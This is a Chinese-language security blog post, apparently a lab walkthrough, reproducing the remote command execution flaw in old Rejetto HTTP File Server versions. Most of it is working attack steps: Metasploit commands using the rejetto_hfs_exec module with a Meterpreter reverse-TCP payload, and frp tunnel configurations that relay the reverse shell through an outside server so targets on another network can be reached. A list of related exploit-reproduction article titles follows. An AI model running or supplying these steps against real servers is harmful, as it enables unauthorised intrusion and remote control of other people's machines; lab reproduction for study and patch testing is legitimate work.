HTTPfileserver rce復現(HFS)

原創 whojoe 2020-07-04 00:41

HTTPfileserver rce復現(HFS)

環境搭建

hfs在比較早的版本存在命令執行漏洞,2.3c及以前的2.3x版本
下載鏈接

http://d3.meisq.net:806/1206/hfshttp.zip

打開之後設置默認運行
這裏 kaliip192.168.164.129
HFSip192.168.164.128
在這裏插入圖片描述

漏洞復現

同一網絡環境

kali配置

msfconsole
search hfs
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.164.128
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.164.129
show options

其他配置不用修改,可以根據環境和實際情況進行修改
在這裏插入圖片描述

run

在這裏插入圖片描述

內網msf

首先把hfs橋接到局域網,之後kali在內網,
hfsip192.168.1.120
kaliip192.168.164.129
vpsip192.168.1.110
這裏在局域網模擬公網環境

msfconsole
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.1.120
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.110
show options

在這裏插入圖片描述
192.168.164.110啓動frps

frps -c frps.ini

frps.ini配置

[common]
bind_port = 7000
token = 12345678

kali啓動frpc

/root/frp30/frpc -c /root/frp30/frpc.ini

frpc.ini配置

[common]
server_addr = 192.168.1.110
server_port = 7000
token = 12345678

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 4444
[http]
type = tcp
local_ip = 127.0.0.1
local_port = 8080
remote_port = 8080

msf啓動

run

在這裏插入圖片描述

小結

這是實際遇到的環境,當時遇到了好多問題,所以總結一下。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Apache solr xxe漏洞復現(CVE-2017-12629)

Apache solr xxe漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker syste

whojoe 2020-07-07 23:32:01

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker sy

whojoe 2020-07-07 23:32:01

Apache Solr rce復現(CVE-2019-0193)

Apache Solr rce復現(CVE-2019-0193)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 8.2.0 環境搭建 啓動docker systemctl start docker 獲取

whojoe 2020-07-07 23:32:01

(有下載鏈接)F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)前言漏洞詳情影響版本修復建議環境搭建漏洞復現參考文章 前言 漏洞詳情 F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、

whojoe 2020-07-06 23:41:30

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl start doc

whojoe 2020-07-06 23:00:48

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl s

whojoe 2020-07-06 23:00:48

weblogic CVE-2020-2555 反序列化RCE 復現

文章目錄前言0x01 漏洞說明0x02 影響版本0x03 漏洞利用0x04 注意的地方0x05 修復建議0x06 時間線0x07 參考鏈接 前言 本教程及工具僅供技術學習交流、請勿用於非法行爲、否則後果自負 0x01 漏洞說明

iptableskk 2020-07-06 21:25:57

Windows SMBv3 漏洞復現(CVE-2020-0796)

Windows SMBv3 漏洞復現(CVE-2020-0796)前言環境搭建漏洞復現參考文章 前言 漏洞介紹 微軟SMBv3 Client/Server遠程代碼執行漏洞CVE-2020-0796 影響範圍: Windows 10

whojoe 2020-07-06 05:35:41

Supervisord 遠程命令執行漏洞(CVE-2017-11610)

Supervisord 遠程命令執行漏洞(CVE-2017-11610) 一、漏洞介紹 Supervisord是一款用Python語言開發的管理後臺應用(服務)的工具,方便運維人員使用圖形化界面進行管理。 Supervisord曾

limb0 2020-07-05 19:14:36

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600)

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600) 一、漏洞介紹 2018年3月28日,Drupal官方發佈新補丁和安全公告,宣稱Drupal 6,7,8等多個子版本存在遠程代碼執行漏洞,攻

limb0 2020-07-05 19:14:36

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)前言影響編號環境搭建漏洞復現參考文章 前言 影響 Apache Tomcat = 6 7 <= Apache Tomcat <7.0.100

whojoe 2020-07-05 14:51:22

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Solr漏洞 CVE-2019-17558漏洞復現

CVE-2019-17558漏洞復現前言 Apache Solr 是一個開源的搜索服務器。 cve-2019-17558 Apache Solr 代碼注入漏洞 漏洞影響版本5.0.0 到 8.3.1 漏洞影響:用戶可以注入自定

小陈classmate 2020-07-05 14:10:42

Drupal 遠程代碼執行漏洞(CVE-2019-6339)

Drupal 遠程代碼執行漏洞(CVE-2019-6339) 一、漏洞介紹 Drupal core是Drupal社區所維護的一套用PHP語言開發的免費、開源的內容管理系統。 Drupal core 7.62之前的7.x版本、8.6

limb0 2020-07-04 12:23:17

CVE-2020-1948補丁繞過 Apache Dubbo 遠程代碼執行漏洞

漏洞背景 2020年06月23日, 360CERT監測發現 Apache Dubbo 官方 發佈了 Apache Dubbo 遠程代碼執行 的風險通告,該漏洞編號爲 CVE-2020-1948,漏洞等級:高危。 Apache Du

AmyBaby囍 2020-07-04 11:53:11